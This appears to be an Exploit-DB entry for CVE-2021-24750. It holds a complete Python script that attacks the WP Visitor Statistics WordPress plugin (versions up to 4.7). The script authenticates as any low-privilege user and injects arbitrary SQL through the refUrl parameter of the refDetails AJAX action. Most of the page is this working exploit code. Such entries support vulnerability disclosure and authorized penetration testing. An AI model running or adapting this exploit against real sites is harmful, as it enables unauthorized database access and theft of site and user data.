WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection

EDB-ID:

50619

CVE:

2021-24750

EDB Verified:

Author:

Ron Jost

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2022-01-05

Vulnerable App: 
# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
# Date 22/12/2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.plugins-market.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip
# Version: <= 4.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24750
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md

'''
Description:
The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action,
available to any authenticated user, which could allow users with a role as low as
subscriber to perform SQL injection attacks
'''

# Banner:
banner = '''
 ___  _  _  ____     ___   ___  ___   __     ___   __  ___  ___   ___  
 / __)( \/ )( ___)___(__ \ / _ \(__ \ /  )___(__ \ /. |(__ )| __) / _ \ 
( (__  \  /  )__)(___)/ _/( (_) )/ _/  )((___)/ _/(_  _)/ / |__ \( (_) )
 \___)  \/  (____)   (____)\___/(____)(__)   (____) (_)(_/  (___/ \___/ 

                            [+] WP Visitor Statistics SQL Injection
                            [@] Developed by Ron Jost (Hacker5preme)

'''
print(banner)

import argparse
import requests
from datetime import datetime

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
my_parser.add_argument('-C', '--COMMAND', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
command = args.COMMAND

print('')
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('')

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# Exploit:
exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}'
exploit = session.get(exploit_url)
print(exploit.text)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services